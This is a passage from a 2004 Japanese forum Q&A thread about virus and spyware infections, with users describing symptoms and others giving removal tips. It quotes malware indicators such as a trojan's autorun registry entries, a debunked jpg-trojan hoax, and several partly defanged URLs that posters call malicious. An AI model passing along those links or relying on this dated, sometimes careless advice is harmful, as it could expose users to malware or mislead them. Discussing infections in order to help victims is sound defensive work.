spybot / adawareも同様に新しい定義ファイルが落とせません。
ですがetrustだけはこれまで同様にupdateできています。
有名なソフトのupdateが阻害されているということで、
これはウイルスに感染したか?と思い、
etrustとオンラインでスキャンをかけたのですが、
検出されたのは2chのログにあるloverletterくらい。
hostsも見てみましたが、特に妙な記述はありませんでした。
スタートアップにも怪しい記述はありませんし
(強いて言えばphimeって2つあったっけ?
desktopってcommon userと無名だった?というくらいです)

抽象的で申し訳ありませんが、
他にどこかチェックする場所等ありましたら教えてください。

334 :名無しさん@お腹いっぱい。:04/09/18 21:46:14
デスクトップに勝手にエロサイトのショートカットができるのですが、
Spybotや怪しいレジストリを削除しても駆除できません。
どのキーワードで検索したらいいですか?

335 :ぼる ◆yBEncckFOU :04/09/18 21:49:18
>>334
漏れなら「エロサイトのURL」「ショートカット名」「shortcut」「desktop」
を適宜組み合わせて検索してみる

336 :325:04/09/18 23:05:29
ぼるさんありがとうございました!
全てのファイルを表示にしても見えなかったので…
コマプロで削除する事が出来ました。
既に同じ質問があったのですね…
お手数お掛けいたしました。



337 :名無しさん@お腹いっぱい。:04/09/19 05:45:14
赤い血みたいのがわらわら出てくるんですけど
なんでつか??こわい、、、

338 :名無しさん@お腹いっぱい。:04/09/19 06:41:18
>>333
ノートン先生と、eTrustと、両方入っているから競合してるだけだと思う
ノートン先生がちゃんと最新の定義にできるならノートン先生だけにしろ
そうじゃないならeTrustだけにしろ

常駐するアンチウィルスソフトは2つ入れちゃダメ!

339 :名無しさん@お腹いっぱい。:04/09/19 10:22:23
ウィルス対策に全く無頓着だったド素人です。

ようやく何かソフトを買おうと思うようになったのですが、どれが
いいのかわかりません。

<ソースネクスト> ウイルスセキュリティ 2005
http://www.biccamera.com/bicbic/app/w?SCREEN_ID=bw011100&fnc=f&ActionType=bw011100_01&PRODUCT_ID=0010048963&BUY_PRODUCT=0010048963,1980

<トレンドマイクロ> ウイルスバスター 2004 インターネットセキュリティ
http://www.biccamera.com/bicbic/app/w?SCREEN_ID=bw011100&fnc=f&ActionType=bw011100_01&PRODUCT_ID=0010048963&BUY_PRODUCT=0010048963,1980

例えばこの2つ。機能は大体一緒だと思うのですが、何が決定的に異なるのでしょうか?
ウイルスセキュリティ2005でも最低限のものとしては十分ですか?

340 :名無しさん@お腹いっぱい。:04/09/19 10:49:41
ウイルスに感染した場合、そのパソコンのHDDを他のパソコンに繋いで
感染したHDDをスキャンして、元のパソコンに戻せば大丈夫ですか?

341 :名無しさん@お腹いっぱい。:04/09/19 11:52:23
>>339
ソースネクストは激しくお勧めしない。不具合が多すぎる
その2つのどちらかを買うのならウィルスバスターかな。
フリーのソフトもあるから、情報は色々探してみろ

342 :名無しさん@お腹いっぱい。:04/09/19 12:17:36
>>339
俺もソースネクストはやめとくことを強く推奨する。
体験した本人が言うんだから間違いないorz

343 :名無しさん@お腹いっぱい。:04/09/19 12:38:30
PC上のmp3、ipg、zip、wmaなどのファイルふぁ全て同じ容量になって破損していたのですがこれはウィルスでしょうか?
それともPCが壊れてるだけ?

344 :名無しさん@お腹いっぱい。:04/09/19 13:07:37
当方、XP使用しておりますが、
backdoor Agentが毎回検出されるのと、windowsのundateをしようとすると
Active-Xがどうのこうのとかいうメッセージが出てきて一向にundateできません
どうしたらよいのでしょうか

345 :名無しさん@お腹いっぱい。:04/09/19 13:32:29
>>339
ソースネクストはやめておいたほうがいい

>>343
ウィルスですか?と聞く前にスキャン

>>344
Backdoor駆除してからUpdate

346 :名無しさん@お腹いっぱい。:04/09/19 16:13:41
>>343
nyやめて、ネットから引退してください

347 :名無しさん@お腹いっぱい。:04/09/19 16:14:27
>>344
マルチ

348 :名無しさん@お腹いっぱい。:04/09/19 16:57:24
ノートン先生が検出し、削除できなかったSpyware.Iwantserchを
手動削除しようとしましたがコマンドプロンプロからも見つかりません。
再スキャンをかけると同じ感染ファイルがまた検出されます。

対策知っている方いたらお願いします。
(ノートン先生はライブアップデート済み)

349 :名無しさん@お腹いっぱい。:04/09/19 17:16:53
>>348
スパイウェアの一種だから、SpybotとAd-awareSEでスキャン・駆除できるかもね
両方ともフリーウェア。

350 :名無しさん@お腹いっぱい。:04/09/19 17:17:29
>348
そんなあなたに>85-86

351 :348:04/09/19 17:38:03
【使用OS、WindowsUpdateの有無】XP(SP2)、有
【使用AntiVirus、Updateの有無】Norton AntiVirus、有
【スキャンした結果】
ウィルス名:Spyware.Iwantserch
結果・場所:圧縮ファイル rundlg32.dll < C:\Documents and Settings\02765mari
Local Settings\Temporary Internet Files\Content.IE5\650VILYH\rundlg32[1].cab
は スパイウェア 脅威です。
圧縮ファイル rundlg32.dll < C:\Documents and Settings\02765mari\Local Settings\Temporary Internet Files\Content.IE5\WXSN4RS7\rundlg32[1].cab
は スパイウェア 脅威です。…とノートン先生談。
【症状】今のところなし。サイト閲覧中に感染?
【とった措置】ノートン先生・スパイボットスキャン→手動削除(コマンドプロンプト)

よろしくお願いします。

>349
Spybot試しましましたが、駆除できませんでした。



352 :ぼる ◆yBEncckFOU :04/09/19 17:57:52
>>351
IEのキャッシュ削除すればいいんでないNO?

ツール→インターネットオプション→全般
→インターネット一時ファイル→ファイルの削除
→「すべてのオフラインコンテンツを削除する」にチェックしてOK

でノートンで再スキャン

353 :339:04/09/19 18:06:09
みなさま、ありがとうございます。ソースネクストはやめときますね・・・

354 :名無しさん@お腹いっぱい。:04/09/19 19:47:06
>352
試してみましたが、ダメでした…

が、システム復元後、再スキャンしたら消えていました
レスありがとうございました!

355 :名無しさん@お腹いっぱい。:04/09/19 21:54:11
W32.Yahaの症状が出ていますが、見つからず駆除できません。
これで合っているのか、それとも違うものなのか教えてください。
【使用OS】WinXP Personal SP1
【WindowsUpdateしてるか】たまにナローな環境で使用しているので、その時はしていませんが、BBの時は行っています。
【AntiVirusは何を使っているか】McAfee VirusScan 疑惑後に入れた体験版ウィルスキラー
【ちゃんとUpdateしてるか】WindowsUpdateと同様BBな時のみ。
【スキャンした結果(ウイルス名・発見場所)】発見されず。
【症状を具体的に、分かる限りすべて書く】起動時に「vsynmgr.exe はエラーが発生し閉じられる必要がありました。」と必ず出る。
データ送信量が多い気がする。受信より少し多い程度。何もしていないときは増える事はない。
マカフィーを起動し閉じると「scan32.exeが閉じる」とメッセージが出る。
【何をしたらそんなことになったのか】プリンタのドライバをインストールした。外付けROMで入れたのだが、
インスコ後、安全な取り外しを実行せずにPCカードを引っこ抜いた。それとネット。
【これまでにとった措置】オンラインスキャン(マカフィー、シマンテック、トレンドマイクロ3箇所全て)が発見できず。
自分のPCに最初から入っていたマカフィーもしたが、期限が切れてるかも。PC購入は2001年秋。
バージョンは2004年9月14日になってる。駆除ソフトをDLし実行→ウィルス存在せずで終了

356 :名無しさん@お腹いっぱい。:04/09/19 22:23:52
>>355
アンチウイルスソフトが競合してscan32.exe(マカフィー)vsynmgr.exe(ウイルスキラー?)
の起動がうまくいってないんでないの?

どっちか片方アンスコして再起動してみてちょ

357 :名無しさん@お腹いっぱい。:04/09/19 22:41:24
なんか変なURL踏んじゃって、変なツールバー出るし何回やってもホームのページが
固定されてるし…。助けてください!お願いします。

358 :名無しさん@お腹いっぱい。:04/09/19 22:44:33
釣られないクマ・・・

359 :名無しさん@お腹いっぱい。:04/09/19 23:35:25
初心者はとりあえずパンダオンラインスキャンでもやっとけ

360 :名無しさん@お腹いっぱい。:04/09/20 00:05:51
質問なんですが
アドウェアが16個も発見され、削除しようとウィルス名からリンクされたページでの
「定義の更新→設定→コントロールパネル→追加と削除」を実行したんですが
追加と削除のファイル一覧にウィルスが表示されておらず削除が出来ません;
何か方法を間違っているのでしょうか
解決方法などあればよろしくお願いいたします
スレ違いでしたらすみません

361 :名無しさん@お腹いっぱい。:04/09/20 02:22:16
パスワード付きの圧縮ファイルの中身も
ウイルススキャンできるんでしょうか?

362 :名無しさん@お腹いっぱい。:04/09/20 02:26:12
>>361
それをやるには圧縮ファイルのパスワードを解読して中のファイルへ
アクセスする(通常は一時的にテンポラリに解凍する)必要がありますが
それができるウイルス対策ソフトなんてあるのでしょうか?

363 :名無しさん@お腹いっぱい。:04/09/20 12:10:22
>>360
他人に何かを質問しようという気持ちが全く見えない
自分がどういう環境でどういうソフトで何をやったのか?
という基本的な情報を何故書けないのか?

364 :名無しさん@お腹いっぱい。:04/09/20 12:35:07
スルーすればいいよ。12時間も前田氏

365 :名無しさん@お腹いっぱい。:04/09/20 20:20:22
誘導されてきました。
お願いします。

XPで2ちゃん壺入れてます。
シマンテックのオンラインスキャンでかけたら
C:\Program Files\tora3\2chtubo\log\pc5.2ch.net\sec\**********.dat は
Unix.Penguin に感染しています。

と出ました。
これは入れてる壺のだと思うんですが
何か対策した方がいいのでしょうか?
**********の部分は数字です。


366 :名無しさん@お腹いっぱい。:04/09/20 20:32:56
しなくていいんじゃない

367 :名無しさん@お腹いっぱい。:04/09/20 20:38:21
win2kのsystem32にCmdLineExt03.dllってのが勝手にインスコされてたんだが
これってウイルス?

368 :名無しさん@お腹いっぱい。:04/09/20 20:55:08
>365
今回の件は気にしなくてもいいが
ウイルス気にするならアンチウイルスソフト入れれ

369 :名無しさん@お腹いっぱい。:04/09/20 20:57:23
>>365
誘導じゃなくて、ここのテンプレに答えが載っているんだが。

370 :名無しさん@お腹いっぱい。:04/09/20 21:05:45
>>367
http://abates.livejournal.com/57538.html
英語読めないが、かなり怪しげなファイル・・・

371 :367:04/09/20 21:22:02
CmdLineExt03.dllがインスコされた時間と同時刻にLocal Settingsに
SIntfNT.dll、SIntf32.dll、SIntf16.dllがインスコされてた
これSecuRomのファイルみたいだけどCmdLineExt03.dllはなんだか分からん

372 :367:04/09/20 21:25:36
GTA3vicecity起動インスコされるようだな
今までインスコされること無かったのになんで急にインスコするようになったんだろう


373 :名無しさん@お腹いっぱい。:04/09/20 22:18:04
w2kで、起動時にデスクトップの中心に
fRf"f^fNfg
と書かれたダイアログが出ます。右上に最小化/最大化/閉じるボタンもついてないただの四角の上にかかれてます
クリックすると消えるんですがタスクマネージャで見ても変わった名前のプロセスはありません。
ウイルスか何かでしょうか?

374 :名無しさん@お腹いっぱい。:04/09/20 22:26:54
>>373
>>85-86

375 :名無しさん@お腹いっぱい。:04/09/20 22:43:03
>>355
です。
>>356
vsynmgr.exeはウィルスキラーを入れる前から出てました。
ウィルスキラーを消したんですが、いまだにscan32と共に出ています。

376 :名無しさん@お腹いっぱい。:04/09/21 00:07:38
>>375
asynmgr.exeのミスタイプじゃない?
これだったらマカフィーのexeかもしれないからマカフィーが
何かの拍子でイカれたのかも・・・

とりあえず一度マカフィー再インスコしてみてちょ

vsynmgr.exeであってるとしたらこいつが何か調べるためにもこのexeのパス、同じフォルダ中にある他のファイル
と作成日時に違いがないか調べてみて。

あとはセキュリティーソフトの機能を停止させるウイルスがいる可能性もあるから
ファイル名を指定して実行→msconfigでスタートアップに登録されているexeで
怪しいのがないかチェック

あとregeditでHKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\open\command
の値が"%1" %* になってるかチェック




377 :365:04/09/21 00:14:16
>>366
サンクスコです

>>368
サンクスコです。
NISは入れてあるのですが
なんとなく気まぐれでオンラインスキャンをかけてみた所
上記のモノが出てきました。
NISではひっかからなかったので気になって質問しました。

>>369
>>7を見てみましたが どの記載が適してるのか不明だったので
こちらでも質問しました。
>>7のどこに答えがありますか?

378 :名無しさん@お腹いっぱい。:04/09/21 00:27:17
>>377
>>7のQ1を声にだして100回読んでみろ。


379 :http://pc5.2ch.net/test/read.cgi/sec/1095637802/16:04/09/21 00:35:30
>377
俺は誘導してないよ。
レス番打ってやっただろう。

お前は>>7 のリンク先全部読んで日本語の勉強し直せ。

http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/1-4


380 :375:04/09/21 02:16:39
>>376
レスさんくすです。
avsynmgrの打ち間違いでした。
マカフィーは元々入っていた奴なんで、アンインストールしたら返って面倒な気がする・・・

regeditは値は指摘した通りのものになっています。

あと、OLEのアドレス帳には自分のアドレスしか入っていないんですが、
(使用するものはメール鯖に入ってる。友達が居ないわけではないです)ウィルスメールは来ていません。
壊れただけかなぁ・・・

381 :名無しさん@お腹いっぱい。:04/09/21 04:21:19
マカフィーのせいでうちはPCあぼーんしたよ
期限すぎて更新したとたんにっちもさっちもぶるどっく

382 :名無しさん@お腹いっぱい。:04/09/21 04:36:38
>>379
それで貼ったリンクがそれかよ
お前はここで答える資格ないな

383 :名無しさん@お腹いっぱい。:04/09/21 07:05:04
こんな事する馬鹿がいるからここの評判落ちるんじゃん。
ハァァ。。。

384 :名無しさん@お腹いっぱい。:04/09/21 07:10:49
「ストーカー(粘着野郎)に共通する特徴」
http://gb.bbs.ws/book.php?book=gall1
・初対面の人にも「自分史」を話したがる
・筆まめ
・電話魔
・人によくカマをかける
・親しくも無いのに高価なプレゼントを贈る
・他人への評価が極端に変わりやすい
・敵・味方を区別したがる
・怒り出すと止まらない
・人並み以上に情報に敏感
・複数以上の仕事を同時にこなせる
・拒絶・拒否を受け入れる事ができない、自己中心的
・自分の弱点や劣等感を感じていても、自分で認めようとしない
・何かと周りのせいにして言い訳ばかり
・大人になりきれない幼児性
・最初は、優しくて場合によっては魅力的

385 :名無しさん@お腹いっぱい。:04/09/21 07:38:48
avast!4スレから、スレ違いの指摘を受けて来ました。
このソフトはかなり好きで、正式に日本語化する前から愛用しています。

しかし、ここでトラブル発生。
未だもって、「プロキシサーバ」というものの概念がわからない厨なんですが、
POP/SMTPサーバにはローカルの、127.0.0.1 を置いて使用していたのですが、
新たに、SPAM対策として、SpamDump というシェアウエアを導入しました。
が、このソフトもローカルの、127.0.0.1をそれぞれ必要とする、ということで、
重複している状態です。

ヘルプマニュアルにもそれにあたるらしきところは無く、どのように共存してい
ったら良いものか・・ネットワーク関連はほとんど分からなくて、ここにたどり着
きました。

教えてえらい人!!

386 :名無しさん@お腹いっぱい。:04/09/21 08:36:38
>>385
使えません

387 :名無しさん@お腹いっぱい。:04/09/21 12:19:32
>>372
するようにしたからなった。
今は航海している。

388 :名無しさん@お腹いっぱい。:04/09/21 13:39:05
>382
じゃあお前が答えてやれよ

389 :名無しさん@お腹いっぱい。:04/09/21 13:49:59
始めまして 質問なんですがウイルススキャンしたらPE.parite.Aというのが大量に表示されたんですが・・どうしたらいいのでしょう?

390 :名無しさん@お腹いっぱい。:04/09/21 14:02:17
>>385
http://pc5.2ch.net/test/read.cgi/sec/1095226174/425

391 :名無しさん@お腹いっぱい。:04/09/21 15:25:10
>389
そんなあなたに>85-86

392 :名無しさん@お腹いっぱい。:04/09/21 15:29:47
トロイの木馬ってなに?
やばいの?

393 :名無しさん@お腹いっぱい。:04/09/21 15:50:42
文章が読めないから初心者というんだな

394 :名無しさん@お腹いっぱい。:04/09/21 15:57:39
>>392
三角木馬みたいなもんだ。気にするな。

395 :名無しさん@お腹いっぱい。:04/09/21 17:49:06
>>392
気にしすぎるとシュリーマンのような嘘つきになる

396 :名無しさん@お腹いっぱい。:04/09/22 02:42:33
N速で下のjpg踏んじゃったんだけど

tp://white.jpg-gif.net/bbsx/1/img/110153.jpg

>そのjpgはトロイの木馬系の亜種ウイルスでワクチンがない
>(名称)
>アングラ俗称で正式名はまだない
>ipeg_troj2174
>(特徴)
>1時間以上パソコンにあるとjpgからトロイ木馬がハードディスクに寄生する。
>30分毎にレジストリー情報を送信する
>寄生したあとは普通のjpgだから見てもどうもない
>貼り付けた人は危険
>(除去方法)
>なし。ハードディスクを初期化するしかない

これ本当でしょうか?XPのSP1のセキュリティホール狙った奴なんでしょうか?

397 :名無しさん@お腹いっぱい。:04/09/22 06:35:19
>>396
俺の推測だがそれは嘘だろ。何もないはず。
まずそんなウイルス聞いたことがない。

>そのjpgはトロイの木馬系の亜種ウイルスでワクチンがない
トロイの木馬系亜種って何だ? netsky(ウイルス名)の亜種とかならわかるけど

>1時間以上パソコンにあるとjpgからトロイ木馬がハードディスクに寄生する。
ハードディスクに寄生するなんて無理

>寄生したあとは普通のjpgだから見てもどうもない
最初からどうもないjpg


あ〜なんでこんな時間まで起きてるんだろう   なぜなら厨だから
ウイルスの情報載せた厨を信じるか 平日のこんな時間まで起きている厨を信じるかは自由だが・・・・


398 :名無しさん@お腹いっぱい。:04/09/22 14:47:34
DLしたZip開いたらALEScan.exeっていうやばそうなファイルが入ってたんで速攻消してみました。
その後ぐぐったらBackdoor関連のセキュリティーページ(国外)が出てきたので
かなり不安になったのですが、実行してなければ大丈夫なんでしょうか?

399 :名無しさん@お腹いっぱい。:04/09/22 15:19:32
毒入りりんごを持っててもなんの害もないだろ
喰わなければ問題なし

400 :名無しさん@お腹いっぱい。:04/09/22 15:27:29
>>398
手遅れ

401 :名無しさん@お腹いっぱい。:04/09/22 15:56:08
>>398
とりあえず、スタートアップに見慣れないものが無いかチェックしてから
ウイルスとスパイウェアのチェックをしたほうがよさげ。

402 :名無しさん@お腹いっぱい。:04/09/22 15:56:20
>>398
不安になったら即ぜんぶスキャンしるべし

HDDぜんぶスキャン終わってOKなら一流
ぁゃιぃものが検疫されて終わったら二流
字が下手なのは金釘流
アラゴの円盤は渦電流

403 :名無しさん@お腹いっぱい。:04/09/22 16:02:35
>>401
RAMASSTとかいうのがWindows\system32フォルダにあるっぽいです。。。

>>402
ウィルス等は全く検出されませんでした。

404 :名無しさん@お腹いっぱい。:04/09/22 16:05:53
でもこれRAM補助ツールですよね・・・
しかしこんなの入れた覚えは・・・

405 :名無しさん@お腹いっぱい。:04/09/22 16:20:28
もうだめぽ
再インスコするしかないぽ

406 :名無しさん@お腹いっぱい。:04/09/22 16:25:32
事故解決しました

407 :名無しさん@お腹いっぱい。:04/09/22 17:05:38
とりやえず再起動しても表面上は問題なし。
裏でヤラレてるかも知んないけど。。。(´・ω・`)

どーでもいいんだけどこのスレ宙が多いのは仕様ですか?
てっきりセキュリティーの専門家とか質問に来た素人だけが来てる板かと思ってた。
質問スレがこの有様だからねぇ。
>>401-402 サンクス。何かあったらまた質問しにきます。

408 :名無しさん@お腹いっぱい。:04/09/22 17:08:09
と、sageることができない宙(厨のことか?)が申しております

409 :名無しさん@お腹いっぱい。:04/09/22 17:09:36
>>407
ダウソ宙は二度と来るな

410 :名無しさん@お腹いっぱい。:04/09/22 17:27:05
テンプレすら読まない輩に対してつっけんどんな対応をするのは仕様です

411 :名無しさん@お腹いっぱい。:04/09/22 18:05:08
はじめまして、
IEのホームがクール何とかになってしまうウイルスにかかってしまいました。
オンラインチェックで引っかかったファイルはすべて消したのですが
それでもホーム設定のところは直りません。
どうしたら良いもんでしょうか、、、orz

412 :名無しさん@お腹いっぱい。:04/09/22 18:13:54
感染するとデスクトップの絵をうpロダにあげて、
それへのリンクを 2ch の特定スレに自動書き込みするウィルスはやってる?

やられているスレ
角二 【うpろだ】アップローダー案内所11【アプロダ】
http://idol.bbspink.com/test/read.cgi/ascii2d/1095176627/


413 :名無しさん@お腹いっぱい。:04/09/22 18:26:31
>>411
エロ多すぎ

エロサイトを見た(ry
全部書くのマンドクセ

414 :名無しさん@お腹いっぱい。:04/09/22 18:48:42
>>411
新スレ立ったなぁ。

エロサイト見たら…助けて下さい!Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50

テンプレよく読んで実行して、それでもわからなかったら質問汁。

415 :名無しさん@お腹いっぱい。:04/09/22 18:53:05
>>413-414
ありがとうございました。見てみます

416 :415:04/09/22 19:31:41
書いてあるとおりに試してみました。
ダイヤラーなどは出なくなったのですが、
ホーム設定だけは何度やっても
IE再起動すると同じサイトになってしまいます。
どなたかお助けください、、、

417 :名無しさん@お腹いっぱい。:04/09/22 19:33:31
どなたか情報をお願いします。

>>412

418 :名無しさん@お腹いっぱい。:04/09/22 19:36:58
馬鹿なことしてW32/Bereb-Bというウイルスに感染してしまったんですが
ノートンの体験版で修復しようとしても このファイルを修復できません ファイルへのアクセスが拒否されました と表示されて
何もできないんですがどうすればいいですか?


419 :名無しさん@お腹いっぱい。:04/09/22 19:37:57
>>415
CWShredderでぐぐれ

420 :名無しさん@お腹いっぱい。:04/09/22 19:39:13
>>418
起動FDから立ち上げてDOSコマンドで消す

421 :名無しさん@お腹いっぱい。:04/09/22 19:48:57
>>416
何をどこまでやったのか書かんと、わからんよ。
あと、質問汁と言ったのは向こうのスレでって事。
今、優秀な(?)質問者がいて、回答者が気分よくなってる
ところだから、テンプレもロクにやらんで質問しても叩かれる
だけだとは思うが・・・。

422 :名無しさん@お腹いっぱい。:04/09/22 20:02:49
>>418
ノートンで検出されたワーム名で、シマンテックのサイトで手動駆除方法を検索してみ。
レジストリとかいじられてるかもわからんし。

423 :失意のぼる:04/09/22 20:23:17
>>396
亀レスだけど一応
少なくともgdiplus.dllの脆弱性(MS04-028)をついたものではない

1)JPEG中に問題を引き起こすバイトシーケンスがない
2)問題のあるJPEGを検出したVB2004でスキャンしても何も検出されない

他のウィルス対策ソフトでスキャンしても特に異常はないし
そもそもサイズからいって悪質なネタと考えるべき

参考
ttp://lists.netsys.com/pipermail/full-disclosure/2004-September/026454.html

424 :名無しさん@お腹いっぱい。:04/09/22 20:49:56
あるアプリを実行したら壁紙を変えられてしまったのですがどうすれば直せるのでしょうか?

425 :名無しさん@お腹いっぱい。:04/09/22 20:50:45
失意登?失意昇?

426 :名無しさん@お腹いっぱい。:04/09/22 20:56:33
今日はZoneAlerm先生がやけに反応するんですが、なにか新しいワームでも流行ってるんですか?
NetBios、Port135、Port1433、Port445あたりが攻撃されるんですが。

427 :名無しさん@お腹いっぱい。:04/09/22 20:58:45
>>424
>>86の質問テンプレ使ってくれ。
あと、もしwinnyで落としたアプリなら板違い。

428 :名無しさん@お腹いっぱい。:04/09/22 21:01:21
>>424
メモ帳で空白のファイルを作成してそのウイルスの実態に上書き保存→削除
ってどうかな?無理だったらスマソ

429 :名無しさん@お腹いっぱい。:04/09/22 21:03:19
>>424
ny関連はお引き取りください

430 :名無しさん@お腹いっぱい。:04/09/22 21:03:55
>>424
>>7

431 :名無しさん@お腹いっぱい。:04/09/22 21:04:18
>>424
通報しました

432 :名無しさん@お腹いっぱい。:04/09/22 21:44:41
>>412


169 :名無したん(;´Д`)ハァハァ :04/09/22 21:39:41 ID:LP+Ly6X1
23 :名無しさん@ゴーゴーゴーゴー! :04/09/22 21:37:54 ID:kcrfEebX
実行結果:

追加されるファイル:
windows\shellsystem.exe 678kB

追加されるレジストリ:
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'


433 :名無しさん@お腹いっぱい。:04/09/22 21:58:11
何か苺は甘いでウイルスが流行っているんですか?
ttp://up.isp.2ch.net/upload/c=03okari/index.cgi

434 :名無しさん@お腹いっぱい。:04/09/22 22:07:32
私は苺で違法ダウンロードばかりしている犯罪者です
http://news13.2ch.net/test/read.cgi/news/1095854900/
【洒落】キンタマウィルスのWeb版
http://news13.2ch.net/test/read.cgi/news/1095858175/

435 :名無しさん@お腹いっぱい。:04/09/22 22:35:21
【使用OS】 WindowsXP Home
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 Norton Antivirus
【ちゃんとUpdateしてるか】 してるみたい
【スキャンした結果(ウイルス名・発見場所)】 W32.HLLW.Rircなど
C:\DOCUMENTS AND SETTINGS\ALL USERS\の中
【別のオンラインスキャンしたならその結果は】
スキャンすると感染が見つからなかったor別のウイルスの名前が出る
【症状を具体的に、分かる限りすべて書く】
いきなりNortonのダイアログが出て「ウイルスを検出しました」と出る
またその時どんなウイルスでも必ず「ファイルを修復できません」「ファイルへのアクセスが拒否されました」となる
また最近IEの画面が出にくくなった
【何をしたらそんなことになったのか】 普通に常時接続で
【これまでにとった措置】
【その他の質問】
これは感染しているのか、単なる2ch上でウイルスコードを書くだけのいたずらなのか

436 :名無しさん@お腹いっぱい。:04/09/22 23:08:17
>435
ttp://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.rirc.html
まずはここのremoval instructions以降を見て対処

そんでもっかい全ファイルのスキャンをやってみれ

437 :名無しさん@お腹いっぱい。:04/09/23 00:01:19
529 名前:AA略 ◆.AwAwARK.Y [sage] 投稿日:04/09/22 21:00:08 ID:???
2ちゃんのあるスレでデスクトップの画像をキャプされてうpろだに自動うp→スレに書き込みが
されるexeが出てきたね。

zipなりを解凍して(写真集) (ロリータ)〜みたいなフォルダ(実際にはフォルダのアイコンのexe)
がでてきたらご注意を
535 名前: 〜ヽ    ノ ◆25P/xaaPnk [sage] 投稿日:04/09/22 21:36:20 ID:???
exe3つの奴って、軽いきんたまって感じですね。
Regedit開ける知識があれば大した事はないですけど。

536 名前:名無しさん?[sage] 投稿日:04/09/22 21:43:38 ID:???
本スレ721危険
エディタで見たら“This program must be run under Win32”って文字列あり

“アイコン”は、フォルダだけど「フォルダオプション」→表示→すべてのファイルとフォルダ
にチェックマーク入っていないと.exeの拡張子が見えない。

要するに、かっこうは、フォルダだけど、実際は、ぁゃιぃexe
まぁ踏むのは(踏んだのは)自己責任だけど、気を付けて・・・3個ともに!

537 名前:名無しさん?[sage] 投稿日:04/09/22 22:13:46 ID:???
「苺きんたま」だそうです(w


438 :名無しさん@お腹いっぱい。:04/09/23 00:11:45
ゲームとかをしてると突然電源が落ちるのですが、一体どうなっているんでしょうか?
友人に聴いてもお手上げ状態です。

心当たりは
//with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
このファイルを踏んだらウインドが閉じれなくなり、
何かをインストールする画面も消せなかったので強制終了させました。

439 :名無しさん@お腹いっぱい。:04/09/23 00:19:57
>>438
>>86

440 :名無しさん@お腹いっぱい。:04/09/23 00:30:06
【使用OS、WindowsUpdateの有無】XP HOME
【使用AntiVirus、Updateの有無】ウイルスバスター している
【スキャンした結果(ウイルス名・発見場所)】異状なし
【症状】ゲームとかをしてると突然電源が落ちます。
サイトなどを見ている分には電源は落ちません。

心当たりは
//with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
このファイルを踏んだらウインドが閉じれなくなり、
何かをインストールする画面も消せなかったので強制終了させました。
【これまでにとった措置】AD-awareとウイルスバスターのスキャン

441 :名無しさん@お腹いっぱい。:04/09/23 01:07:48
>>7
壁紙が蓮になるウィルスって嫌だな(w

442 :名無しさん@お腹いっぱい。:04/09/23 01:17:10
>>440
最悪ウィルス・スパイウェアてんこ盛りな悪寒

まずここ行って 熟読してHackerDefenderが入れられた無いか確かめろ。
ttp://higaitaisaku.web.infoseek.co.jp/removehacdef.html

そのうえでもう一度、ウイルス、スパイウェアのスキャン汁
(Ad-awareだけじゃなくSpybotも入れといた方がイイ)

それと>>438のアドは危険、絶対踏むな。
(jpgに偽装したhtmlファイル)

443 :名無しさん@お腹いっぱい。:04/09/23 01:25:34
そういや「shellsystem.exeが接続しようとしているんですけど、これって何?」とか
質問していた奴がこの板にいたような。

あれ新種のきんたまウイルスだったのか。

444 :名無しさん@お腹いっぱい。:04/09/23 01:55:57
苺はウィルスとは言えないなぁ。分類するならトロイだな。

445 :名無しさん@お腹いっぱい。:04/09/23 03:58:14
これウィルスチェックで検出されるの?ノートンとかVB2004とかで。

446 :名無しさん@お腹いっぱい。:04/09/23 04:14:18
>>445
まだ対応されてない

447 :名無しさん@お腹いっぱい。:04/09/23 06:03:25
nyじゃないがDL板逝きだな

448 :名無しさん@お腹いっぱい。:04/09/23 06:19:11
さっきいきなりクイック起動のアイコン全てとmydocumentの中身全てと
デスクトップのよく使うアイコンが消えたんですが
これってトロイか何かでしょうか?

449 :名無しさん@お腹いっぱい。:04/09/23 06:52:42
2chを潰すためのウイルス。
面白そうだな。

450 :名無しさん@お腹いっぱい。:04/09/23 08:43:25
http://news18.2ch.net/test/read.cgi/mnewsplus/1095858867/951
http://news18.2ch.net/test/read.cgi/mnewsplus/1095858867/976-978

このレスを見て疑問に思ったんですがzipファイルを解凍しただけで
ウイルスに感染する、あるいはPCがおかしくなるなんてあるんでしょうか?


451 :450:04/09/23 09:08:27
すいません。自己解決しました。
http://internet.watch.impress.co.jp/cda/special/2004/08/19/4290.html
この記事読む限りどうやらあるようですね。勉強不足でした。

452 :名無しさん@お腹いっぱい。:04/09/23 11:44:39
すみません、質問させてもらいます。

ウイルスチェックしたところ、
secure.htmlにJS_STARTPAG.AD感染、
secure32.txtにJS_STARTPAG.AD感染、
toolbar.exeにTROJ_SMALL.AJ感染してました。

対応を見たところ、検出されたファイルは削除してしまって良いと書いてありますが、
削除してしまったらやばそうな感じがします。secure32.txtはsystem32に置いてありますし。

これって削除してしまって良いのでしょうか?

453 :名無しさん@お腹いっぱい。:04/09/23 11:50:46
またエロか

454 :名無しさん@お腹いっぱい。:04/09/23 12:02:22
>>452
さっさと削除しろ。

455 :名無しさん@お腹いっぱい。:04/09/23 12:12:03
苺金玉に感染したか否かを調べる方法を教えて下さい。
昨日の夜中に、金玉アドレスを踏んだような、踏んでないような。
JAVAONで、HTMLなら、自らEXEを実行してなくても、勝手に実行している可能性ってあるんですよね?

456 :名無しさん@お腹いっぱい。:04/09/23 12:14:34
>>454

レスありがとうございます。
友人に少し聞いてみたところ、Windowsが起動しなくなると言っていましたが、
信じていいんですね?

457 :名無しさん@お腹いっぱい。:04/09/23 12:28:19
>>456
じゃあ、友達を信じればいいじゃん
友達はwindowsに詳しいんだろ?

458 :名無しさん@お腹いっぱい。:04/09/23 12:47:09
>>455
shellsystem.exeでHDD内を検索しろ。
exeを実行しなければ今の所は大丈夫だとは思うが。

苺金玉はDL板行けば感染した場合での削除方法が上がってるので、今後はそちらで。

459 :名無しさん@お腹いっぱい。:04/09/23 13:40:50
windowsフォルダ内に
$NtUninstallQ{何かの数字が入ってる}$
というフォルダがいくつもあるんですが
